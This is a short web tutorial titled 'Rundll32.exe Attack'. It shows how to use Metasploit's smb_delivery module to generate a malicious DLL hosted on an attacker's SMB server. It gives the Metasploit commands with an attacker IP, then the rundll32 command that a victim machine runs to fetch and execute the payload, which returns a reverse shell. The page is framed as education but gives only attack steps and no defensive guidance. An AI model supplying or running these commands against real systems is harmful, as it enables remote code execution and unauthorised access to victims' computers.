- Trending Categories
Data Structure
Networking
RDBMS
Operating System
Java
iOS
HTML
CSS
Android
Python
C Programming
C++
C#
MongoDB
MySQL
Javascript
PHP
- Selected Reading
- UPSC IAS Exams Notes
- Developer's Best Practices
- Questions and Answers
- Effective Resume Writing
- HR Interview Questions
- Computer Glossary
- Who is Who
Rundll32.exe Attack
Rundll32.exe is associated with Windows Operating System that allows you to invoke a function exported from a DLL, either 16-bit or 32-bit and store it in proper memory libraries.
Launch Rundll32 Attack via SMB
Metasploit contains the “SMB Delivery” module which generates malicious dll file. This module serves payloads via an SMB server and provides commands to retrieve and execute the generated payloads.
Generate DLL payload
- use exploit/windows/smb/smb_delivery
- msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109(attacker IP)
- msf exploit(windows/smb/smb_delivery) > exploit
Now, you execute this generated malicious dll file on the victim machine with the help of rundll32.exe, you will get the reverse connection at your machine.
rundll32.exe \192.168.1.109\vabFG\test.dll,0
Updated on 23-Sep-2020 12:23:33
- Related Questions & Answers
- Converting Tkinter program to exe file
- Difference between Active Attack and Passive Attack
- The 51% Attack
- Cyber Attack Symptoms
- What is a Ping Flood Attack or ICMP Flood Attack?
- What is Attack Vector?
- What is Ransomware Attack?
- What is Simjacker attack?
- What is Replay Attack?
- Difference between Threat and Attack
- Knights' Attack in Python
- What is a Backdoor Attack?
- What is Social Engineering Attack?
- What is a Whaling Attack?
- What is a Replay Attack?
Advertisements